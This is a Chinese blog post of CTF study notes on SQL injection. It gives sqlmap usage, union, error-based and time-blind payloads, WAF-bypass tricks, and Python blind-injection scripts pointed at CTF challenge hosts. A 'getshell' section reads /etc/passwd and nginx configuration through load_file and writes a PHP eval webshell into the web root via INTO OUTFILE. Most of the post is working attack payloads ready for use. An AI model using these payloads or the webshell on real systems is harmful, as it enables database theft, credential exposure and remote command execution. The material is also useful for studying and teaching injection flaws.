<!DOCTYPE html>
<html lang="zh-cn">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, shrink-to-fit=no">
    <meta name="referrer" content="origin">
    <meta http-equiv="Cache-Control" content="no-transform">
    <meta http-equiv="Cache-Control" content="no-siteapp">
    <title>
        
            sql注入测试方法.md
        
    </title>
    <link rel="shortcut icon" href="#"/>

    <link type="text/css" rel="stylesheet" href="/font/LongCang.css">
    <link type="text/css" rel="stylesheet" href="/font/Monda.css">
    <link type="text/css" rel="stylesheet" href="/font/NotoSansSC.css">
    <link type="text/css" rel="stylesheet" href="/font/NotoSerifSC.css">
    <link type="text/css" rel="stylesheet" href="/font/Playball.css">
    <link type="text/css" rel="stylesheet" href="/font/PTMono.css">
    <link type="text/css" rel="stylesheet" href="/font/Roboto.css">
    <link type="text/css" rel="stylesheet" href="/font/RobotoSlab.css">
    <link type="text/css" rel="stylesheet" href="/font/Rosario.css">
    <link type="text/css" rel="stylesheet" href="/font/UbuntuMono.css">

    <link type="text/css" rel="stylesheet" href="/css/base.css">
    <link type="text/css" rel="stylesheet" href="/css/code.css">

    <script type="text/javascript" src="/js/jquery-3.4.1.min.js"></script>
<meta name="generator" content="Hexo 6.3.0"></head>
<body>
    <a id="cover"></a>
    <link type="text/css" rel="stylesheet" href="/css/post.css">
<div id="header" class="header">
    <div class="vertical">
        <div class="inner">
            
                <h1 class="header-subtitle">sql注入测试方法.md</h1>
                <div class="header-subinfo">
                    <p class="article-info-text">
                        <span>
                            <i class="iconfont icon-time"></i> 发表时间：2022-10-09
                        </span>
                        
                            <span id="/2022/10/09/sql注入测试方法/" class="leancloud_visitors" data-flag-title="sql注入测试方法.md">
                                <i class="iconfont icon-browse"></i> 阅读：<sapn class="leancloud-visitors-count"></span>
                            </span>
                        
                        <span>
                            <i class="iconfont icon-interactive"></i> 评论：<span class="valine-comment-count" data-xid="/2022/10/09/sql注入测试方法/"></span>
                        </span>  
                    </p>
                    
                    
                        
                            <span class="tag-color">ctfknowledge</span>
                        
                    
                </div>
            
        </div>
    </div>
    
</div>
<div id="container">
    
        <!-- 文章页面 -->
        <div id="article">
            <div class="toc"></div>
            <div class="article-body">
                <h3 id="sql-CTF"><a href="#sql-CTF" class="headerlink" title="sql CTF"></a>sql CTF</h3><h4 id="sqlmap"><a href="#sqlmap" class="headerlink" title="sqlmap"></a>sqlmap</h4><p>sqlmap -u “url”</p>
<p>–data&#x3D;”id&#x3D;1”处理post   </p>
<p>level 1会测试最基础的SQL注入,如AND 和 OR 注入<br>level 2会额外测试时间盲注和布尔盲注<br>level 3会额外测试 union sql注入<br>level 4会额外测试 stacked queries 和找后门<br>level 5会进行最全面的测试,包括测试所有SQL注入类型和尝试绕过可能的WAF和防护。</p>
<p>–level&#x3D;1 进行基础测试<br>–level&#x3D;2 进行基础和中等测试<br>–level&#x3D;3 进行基础、中等和高级测试<br>–level&#x3D;4 进行全部测试但不进行最复杂的测试<br>–level&#x3D;5 进行最全面的和复杂的所有测试</p>
<p>-u → “URL”检测注入点<br>–dbs → 列出所有数据库的名字<br>–current-db → 列出当前数据库的名字<br>-D → 指定一个数据库<br>–tables → 列出表名<br>-T → 指定表名<br>–columns → 列出所有字段名<br>-C → 指定字段<br>–dump → 列出字段内容<br>–current-user → 当前用户<br>–current-db → 当前数据库<br>–is-dba → 是否是管理员<br>–hostname → 主机名<br>–users → 枚举用户<br>–passwords → 枚举用户密码哈希<br>–privilieges → 枚举用户权限</p>
<ul>
<li>判断注入点</li>
</ul>
<p><code>sqlmap -u &quot;http://172.16.1.116/?id=1&quot; --batch</code></p>
<ul>
<li>获取数据库名</li>
</ul>
<p><code>sqlmap -u &quot;http://172.16.1.116/?id=1&quot; --batch --dbs</code></p>
<ul>
<li>获取指定数据库下所有表名</li>
</ul>
<p><code>sqlmap -u &quot;http://172.16.1.116/?id=1&quot; --batch -D 数据库名 --tables</code></p>
<ul>
<li>获取表中字段名</li>
</ul>
<p><code>sqlmap -u &quot;http://172.16.1.116/?id=1&quot; --batch -D 数据库名 -T 表名 --column</code></p>
<ul>
<li>获取数据</li>
</ul>
<p><code>sqlmap -u &quot;http://172.16.1.116/?id=1&quot; --batch -D 数据库名 -T 表名 -C 字段1,字段2…… --dump</code></p>
<h5 id="sqlmap-post传参"><a href="#sqlmap-post传参" class="headerlink" title="sqlmap post传参"></a>sqlmap post传参</h5><p>利用<code>--data=&quot;key=value&amp;key2=value2&quot;</code>这是多个参数，多个参数sqlmap会问你后面参数需不需要测试</p>
<p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240509132003.png" alt="20240509132003"></p>
<p>是否需要测试其他字段</p>
<p>因为注入的是pickachu靶场,最简单的注入无法成功，所以使用第三个级别的去测试<br><code>sqlmap -u &#39;http://ip/pikachu/vul/sqli/sqli_id.php&#39; --data=&quot;id=1&amp;submit=%E6%9F%A5%E8%AF%A2&quot; --level 3</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240509132033.png" alt="20240509132033"></p>
<p>注入成功</p>
<h4 id="function"><a href="#function" class="headerlink" title="function"></a>function</h4><ul>
<li><code>1&#39; or true;#</code></li>
<li><code>1 or true;#</code></li>
<li><code>1||true</code>  <code>1||Flase</code></li>
<li><code>1;show databases;#</code></li>
</ul>
<h6 id="MYSQL-5-7的盲注方法"><a href="#MYSQL-5-7的盲注方法" class="headerlink" title="MYSQL 5.7的盲注方法"></a>MYSQL 5.7的盲注方法</h6><p>题目:buu-[GYCTF2020]Ezsqli</p>
<p>由于sys.schema_table_statistics_with_buffer或sys.x$schema_table_statistics_with_buffer是不存储列名的，所以我们没有办法获取列名，所以我们需要直接得到每一列的数据。<br><code>(select 1,&quot;F&quot;)&gt;(select * from f1ag_1s_h3r3_hhhhh)</code><br>利用的位比较</p>
<ul>
<li>最好不要使用小于号,否则扫<code>&#125;</code>会出问题</li>
<li>判断字段数 <code>2||((select 1,1)&gt;(select * from f1ag_1s_h3r3_hhhhh))</code> <code>2||((select 1,1,1)&gt;(select * from f1ag_1s_h3r3_hhhhh)) ······</code></li>
</ul>
<p>盲注脚本</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">import time </span><br><span class="line">import requests</span><br><span class="line"></span><br><span class="line">url = &#x27;http://a16b39c3-3e29-4b26-aa61-049fe18dcb91.node4.buuoj.cn:81/index.php&#x27;</span><br><span class="line">flag = &#x27;&#x27;</span><br><span class="line">for i in range(1,200):</span><br><span class="line">    low = 32</span><br><span class="line">    high = 127</span><br><span class="line">    mid = (low + high) // 2</span><br><span class="line">    while low &lt; high :</span><br><span class="line">        </span><br><span class="line">        payload =  &quot;2||(ascii(substr((select group_concat(table_name) from sys.schema_table_statistics_with_buffer where table_schema=database()),&#123;&#125;,1))&gt;&#123;&#125;)&quot;.format(i,mid)</span><br><span class="line">        post = &#123;&quot;id&quot;:payload&#125;</span><br><span class="line">        r = requests.post(url=url,data=post)</span><br><span class="line">        if &quot;Nu1L&quot; in r.text:</span><br><span class="line">            low = mid + 1</span><br><span class="line">        else :</span><br><span class="line">            high = mid </span><br><span class="line">        mid = (low + high) // 2</span><br><span class="line">    flag+=chr(mid)</span><br><span class="line">    print(flag)</span><br><span class="line">    time.sleep(0.3)</span><br><span class="line">    if mid &lt;= 32 or mid &gt;=127 :</span><br><span class="line">        break </span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line">url = &#x27;http://64715911-77c6-48a0-9325-ae6a2eb506bd.node4.buuoj.cn:81/&#x27;</span><br><span class="line">def add(flag):</span><br><span class="line">    res = &#x27;&#x27;</span><br><span class="line">    res += flag</span><br><span class="line">    return res</span><br><span class="line">flag = &#x27;&#x27;</span><br><span class="line">for i in range(1,200):</span><br><span class="line">    for char in range(32, 127):</span><br><span class="line">        hexchar = add(flag + chr(char))</span><br><span class="line">        payload = &#x27;2||((select 1,&quot;&#123;&#125;&quot;)&gt;(select * from f1ag_1s_h3r3_hhhhh))&#x27;.format(hexchar)</span><br><span class="line">        #print(payload)</span><br><span class="line">        data = &#123;&#x27;id&#x27;:payload&#125;</span><br><span class="line">        r = requests.post(url=url, data=data)</span><br><span class="line">        text = r.text</span><br><span class="line">        if &#x27;Nu1L&#x27; in r.text:</span><br><span class="line">            flag += chr(char-1)</span><br><span class="line">            print(flag)</span><br><span class="line">            print(flag.lower())</span><br><span class="line">            break</span><br><span class="line">        time.sleep(0.3)</span><br><span class="line">    if chr(char-1)==&#x27;&#125;&#x27; : </span><br><span class="line">        break</span><br></pre></td></tr></table></figure>

<h4 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">时间盲注</span><br><span class="line">sleep()是SQL语句中用于休眠的函数，时间盲注中常用，sleep(x)可以让程序休眠x秒。</span><br><span class="line"></span><br><span class="line">1、判断注入：</span><br><span class="line"></span><br><span class="line">id=1&#x27;and sleep(10)#如果网页反应时间出现了明显延迟，就说明存在基于时间的SQL注入。</span><br><span class="line"></span><br><span class="line">2、爆库样例演示：</span><br><span class="line"></span><br><span class="line">id=1&#x27;and sleep(if(length(database())&gt;10,10,1))&gt;10#--库长</span><br><span class="line"></span><br><span class="line">id=1&#x27;and sleep(if(ascii(mid(database(),1,1))&gt;115,10,1))#–库名</span><br><span class="line"></span><br><span class="line">3、爆表样例演示：</span><br><span class="line"></span><br><span class="line">id=1&#x27;and sleep(if((ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&gt;100),10,1))#</span><br><span class="line"></span><br><span class="line">4、爆字段样例演示：</span><br><span class="line"></span><br><span class="line">id=1&#x27;and sleep(if(ascii(mid((select% column_name from information_schema.columns where%20table_name=&#x27;users&#x27;and table_schema=database() limit 0,1),1,1))&gt;1000,10,1))#</span><br><span class="line"></span><br><span class="line">5、爆数据样例演示：</span><br><span class="line"></span><br><span class="line">id=1&#x27;and sleep(if(ascii(mid((select username from users limit 0,1),1,1))&gt;1,10,1))#</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h4 id="注入"><a href="#注入" class="headerlink" title="注入"></a>注入</h4><ul>
<li><p>字符型注入<br><code>-1 &#39; union select 1,group_concat(schema_name) from information_schema.schemata # &#39;</code></p>
</li>
<li><p>报错注入<br><code>1 union select count(*),concat((查询语句),0x26,floor(rand(0)*2))x from information_schema.columns group by x </code></p>
</li>
</ul>
<h5 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">爆库</span><br><span class="line">id=1&#x27; and (select 1 from (select count(*),concat(0x7e,(select database()),0x7e,floor(rand(0)*2)) x from information_schema.tables group by x) a) %23</span><br><span class="line"></span><br><span class="line">爆表明</span><br><span class="line">id=1&#x27; and (select 1 from (select count(*),concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e,floor(rand(0)*2)) x from information_schema.tables group by x) a) %23</span><br><span class="line">爆字段</span><br><span class="line">id=1&#x27; and (select 1 from (select count(*),concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=&#x27;users&#x27;),0x7e,floor(rand(0)*2)) x from information_schema.tables group by x) a) %23</span><br><span class="line">爆内容</span><br><span class="line">id=1&#x27; and (select 1 from (select count(*),concat(0x7e,(select concat_ws(&#x27;:&#x27;,username,password) from users limit 0,1),0x7e,floor(rand(0)*2)) x from information_schema.tables group by x) a) %23</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">查询到数据库版本</span><br><span class="line">and (updatexml(1,concat(0x7e,(select version()),0x7e),1))</span><br><span class="line"></span><br><span class="line">查询当前数据库</span><br><span class="line">and (updatexml(1,concat(0x7e,(select database()),0x7e),1))</span><br><span class="line"></span><br><span class="line">获取当前数据库表名结构</span><br><span class="line">and (updatexml(1,concat(0x7e,(select(select group_concat(table_name) from information_schema.tables where table_schema=database())),0x7e),1))</span><br><span class="line"></span><br><span class="line">查询该表的字段</span><br><span class="line">and (updatexml(1,concat(0x7e,(select(select group_concat(column_name) from information_schema.columns where table_schema =database() and table_name=&#x27;users&#x27;)),0x7e),1))</span><br><span class="line"></span><br><span class="line">查询字段中的内容</span><br><span class="line">and (updatexml(1,concat(0x7e,(select(select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users)),0x7e),1))</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<ul>
<li>找到报错的地方</li>
</ul>
<p>例题newstarctf week2的sql</p>
<ul>
<li>测试:<code>1&#39;</code><br>发现报错</li>
<li>再次测试 <code>1&#39;and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+ </code><br>报错出现user</li>
</ul>
<p>注入<code>1&#39;and/**/updatexml(1,concat(0x7e,(select database()),0x7e),1)--+</code>(爆出当前库名)</p>
<p>获取表，防止过大，使用<code>limit</code>限制一下，先爆出第一列</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;and/**/updatexml(1,concat(0x7e,(select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=&#x27;wfy&#x27;/**/limit/**/0,1),0x7e),1)--+</span><br></pre></td></tr></table></figure>

<p>获取列名,同样用<code>limit</code>限制</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;and/**/updatexml(1,concat(0x7e,(select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name=&#x27;wfy_admin&#x27;/**/limit 0,1),0x7e),1)--+</span><br></pre></td></tr></table></figure>

<p>获取数据，同样使用<code>limit</code>限制</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;and/**/updatexml(1,concat(0x7e,(select/**/id/**/from/**/wfy_comments/**/limit/**/0,1),0x7e),1)--+  </span><br></pre></td></tr></table></figure>

<p>过多的话可以直接fuzz</p>
<h5 id="绕过和等效函数"><a href="#绕过和等效函数" class="headerlink" title="绕过和等效函数"></a>绕过和等效函数</h5><ol>
<li>等效函数</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">sleep 可以用benchmark代替</span><br><span class="line">substr 可以用mid代替</span><br><span class="line">&lt; &gt; 可以用least(),greatest()代替</span><br><span class="line">= in 可以用like代替</span><br></pre></td></tr></table></figure>

<ol start="2">
<li>绕过</li>
</ol>
<ul>
<li>一般空格被过滤有如下替换方法&#x2F;**&#x2F;     ()    回车(url编码中的%0a)    &#96;(tap键上面的按钮)   tap  两个空格 %a0</li>
</ul>
<h5 id="常用函数"><a href="#常用函数" class="headerlink" title="常用函数"></a>常用函数</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">system_user() → 系统用户名</span><br><span class="line">user() → 用户名</span><br><span class="line">current_user → 当前用户名</span><br><span class="line">session_user() → 连接数据库的用户名</span><br><span class="line">databases() → 数据库名</span><br><span class="line">version() → 数据库版本</span><br><span class="line">load_file() → 读取本地文件的函数</span><br><span class="line">@@datadir → 读取数据库路径</span><br><span class="line">@@basedir → 安装路径</span><br><span class="line">@@version_compile_os → 操作系统</span><br><span class="line">left() → 从左侧开始指定字符个数的字符串</span><br><span class="line">concat() → 没有分隔符的连接字符串</span><br><span class="line">concat_ws() → 含有分割符的连接字符串</span><br><span class="line">group_concat() → 连接一个组的字符串</span><br><span class="line">ascii() → 返回ASCII码</span><br><span class="line">hex() → 将字符串转换为十六进制</span><br><span class="line">md5() → 返回MD5值</span><br></pre></td></tr></table></figure>

<h5 id="sql-getshell"><a href="#sql-getshell" class="headerlink" title="sql getshell"></a>sql getshell</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">MySQL GETSHELL条件和原理:</span><br><span class="line"></span><br><span class="line">条件：</span><br><span class="line"> root权限</span><br><span class="line"> 知道网站根目录绝对路径</span><br><span class="line"> secure_file_priv为空或指定目录（@@secure_file_priv参数可以其值）</span><br><span class="line"> gpc关闭</span><br><span class="line">原理：</span><br><span class="line"> 写入webshell，通过参数执行系统命令，结束后删除webshell</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">附：sqlserver getshell条件和原理</span><br><span class="line"> 条件：</span><br><span class="line">  支持外连</span><br><span class="line">  有sa权限</span><br><span class="line"> 原理：</span><br><span class="line">  开启xp_cmd扩展执行系统命令</span><br></pre></td></tr></table></figure>

<p>payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">sql文件读取</span><br><span class="line">?id=-1)))))) union select load_file(&#x27;/etc/passwd&#x27;),2%23</span><br><span class="line"></span><br><span class="line">读取nginx配置文件</span><br><span class="line">?id=-1)))))) union select load_file(&#x27;/etc/nginx/nginx.conf&#x27;),2%23</span><br><span class="line"></span><br><span class="line">尝试写入</span><br><span class="line">phpinfo()</span><br><span class="line">?id=-1)))))) union select &#x27;&lt;?php phpinfo();?&gt;&#x27;,2 into outfile &#x27;/var/www/html/info.php&#x27;%23</span><br><span class="line"></span><br><span class="line">测试成功</span><br><span class="line">写一句话木马</span><br><span class="line">?id=-1)))))) union select &#x27;&lt;?php eval($_POST[&quot;cc&quot;]);?&gt;&#x27;,2 into outfile &#x27;/var/www/html/cc.php&#x27;%23</span><br></pre></td></tr></table></figure>

<h5 id="注入payload"><a href="#注入payload" class="headerlink" title="注入payload"></a>注入payload</h5><h6 id="报错注入-1"><a href="#报错注入-1" class="headerlink" title="报错注入"></a>报错注入</h6><ol>
<li>特定函数的报错注入</li>
</ol>
<p>extractvalue()和updatexml()函数</p>
<blockquote>
<p>extractvalue() 函数原理： extractvalue(xml_frag, xpath_expr) 函数接收两个参数，一个是XML文档片段，另一个是XPath表达式。正常情况下，这个函数会根据给定的XPath路径从XML文档中提取数据。然而，当XPath表达式构造不当，例如包含了非法字符或者尝试执行一个无法解析为有效XPath表达式的字符串时，函数会抛出错误，并且错误信息可能包含有关查询的信息，这便为报错注入提供了机会。攻击者可以通过精心构造的XPath表达式来触发错误，进而获取数据库敏感信息。</p>
</blockquote>
<blockquote>
<p>updatexml() 函数原理： updatexml(xml_target, xpath_expr, new_value) 也接受三个参数，同样与XML和XPath相关。它试图根据XPath表达式定位到XML文档中的某个节点并用new_value替换该节点的内容。如果XPath表达式被设计成无法解析或指向无效位置，那么这个函数也会产生错误。通过控制XPath字符串内容，攻击者能够引起特定类型的错误，这些错误消息中可能携带了关于数据库表结构或数据的信息。<br>在报错注入攻击中，利用这两个函数的关键在于：<br><code>构造一个会导致函数内部发生错误的输入。 利用错误回显机制，通过分析错误消息推断数据库结构或内容。</code></p>
</blockquote>
<h6 id="综合使用："><a href="#综合使用：" class="headerlink" title="综合使用："></a>综合使用：</h6><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">报错注入（updatexml）</span><br><span class="line">id=1’ and updatexml(1,concat(0x7e,database()),1)#</span><br><span class="line">id=1’ and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)# </span><br><span class="line">id=1&#x27; and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=&#x27;test_tb&#x27;)),1)# </span><br><span class="line">报数据一：id=1&#x27; and updatexml(1,concat(0x7e,(select group_concat(id,&#x27;~&#x27;,flag) from test_tb)),1)#</span><br><span class="line">爆数据二：?id=1&#x27;and(select updatexml(1,concat(0x7e,(select group_concat(COLUMN_NAME)from TABLE_NAME),0x7e),1))#</span><br><span class="line">报错注入（extractvalue）：</span><br><span class="line">id=1’ and extractvalue(1,concat(0x7e,(select database()))) # </span><br><span class="line">id=1’ and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))# </span><br><span class="line">id=1’ and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘test_tb’)))# </span><br><span class="line">id=1’ and extractvalue(1,concat(0x7e,(select group_concat(id,‘~’,flag) from test_tb)))#</span><br></pre></td></tr></table></figure>
<h6 id="整形注入"><a href="#整形注入" class="headerlink" title="整形注入"></a>整形注入</h6><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"># 寻找注入点</span><br><span class="line">http://172.16.1.116/index.php?id=1</span><br><span class="line"></span><br><span class="line"># 判断虚拟表列数 </span><br><span class="line">http://172.16.1.116/index.php?id=1 order by 1</span><br><span class="line">http://172.16.1.116/index.php?id=1 order by 4</span><br><span class="line">http://172.16.1.116/index.php?id=1 order by 5</span><br><span class="line"># 确定列数为4</span><br><span class="line"></span><br><span class="line"># 查看回显位置</span><br><span class="line">http://172.16.1.116/index.php?id=-1 union select 1,2,3,4 #</span><br><span class="line"></span><br><span class="line"># 查询数据库</span><br><span class="line">http://129.168.1.1/?id=-1 union select 1,2,schema_name,4 from information_schema.schemata limit 0,1</span><br><span class="line">http://129.168.1.1/?id=-1 union select 1,2,schema_name,4 from information_schema.schemata limit 1,2</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"># 查询指定数据库中的表</span><br><span class="line">http://129.168.1.1/?id=-1 union select 1,2,table_name,4 from information_schema.tables where table_schema=&#x27;数据库名&#x27; limit 0,1</span><br><span class="line"></span><br><span class="line"># 查询指定表中字段名</span><br><span class="line">http://129.168.1.1/?id=-1 union select 1,2,column_name,4 from informtion_schema.columns where table_schema=&#x27;数据库名&#x27; and table_name=&#x27;表名&#x27; limit 0,1</span><br><span class="line"></span><br><span class="line"># 倒出数据(查看数据库数据)</span><br><span class="line">http://129.168.1.1/?id=-1 union select 1,2,字段名,4 from 数据库名.表名</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h6 id="使用group-concat-函数和concat"><a href="#使用group-concat-函数和concat" class="headerlink" title="使用group_concat()函数和concat()"></a>使用group_concat()函数和concat()</h6><blockquote>
<p>group_concat函数和concat函数介绍：<br>CONCAT() 函数用于将一个或多个字符串连接成一个新的字符串。它可以接受任意数量的参数，并将这些参数按顺序拼接起来。<br>SELECT CONCAT(‘Hello’, ‘ ‘, ‘World’) AS result; 将返回 ‘Hello World’。<br>GROUP_CONCAT() 函数在SQL查询中对属于同一分组的所有行的某一列值进行合并，结果是一个字符串，其中包含所有行该列值的串联，每个值之间可以由指定的分隔符隔开。<br>group_concat()函数则是查询时按照某个特定字段进行分组并select查询，如下：</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">SELECT department_id, GROUP_CONCAT(id SEPARATOR &#x27;,&#x27;) AS employee_ids</span><br><span class="line">FROM employees</span><br><span class="line">GROUP BY department_id;</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"># 查询所有数据库</span><br><span class="line">http://129.168.1.1/?id=-1 union select 1,2,group_concat(schema_name),4 from information_schema.schemata</span><br><span class="line">过滤空格，union,or 双写绕过,查询当前数据库</span><br><span class="line">2&#x27;/**/ununionion/**/select/**/1,database(),3;#</span><br><span class="line"></span><br><span class="line"># 查询指定数据库中的所有表</span><br><span class="line">http://129.168.1.1/?id=-1 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=&#x27;数据库名&#x27;</span><br><span class="line">过滤空格，union,or 双写绕过,查询指定数据库中的所有表</span><br><span class="line">3&#x27;/**/ununionion/**/select/**/1,group_concat(table_name),3/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema=&#x27;NSS_db&#x27;#</span><br><span class="line"></span><br><span class="line"># 查询指定表中所有字段名</span><br><span class="line">http://129.168.1.1/?id=-1 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=&#x27;数据库名&#x27; and table_name=&#x27;表名&#x27;</span><br><span class="line">过滤空格，union,or 双写绕过,查询指定数据库中的所有字段名</span><br><span class="line">2&#x27;/**/ununionion/**/select/**/1,group_concat(column_name),3/**/from/**/infoorrmation_schema.columns/**/where/**/table_name=&#x27;NSS_tb&#x27;#</span><br><span class="line"></span><br><span class="line">#查看数据库数据</span><br><span class="line">http://129.168.1.1/?id=-1 union select 1,2,字段名,4 from 数据库名.表名</span><br><span class="line">过滤空格，union,or 双写绕过,查看数据库数据</span><br><span class="line">2&#x27;/**/ununionion/**/select/**/1,Secr3t,3/**/from/**/NSS_tb#</span><br></pre></td></tr></table></figure>

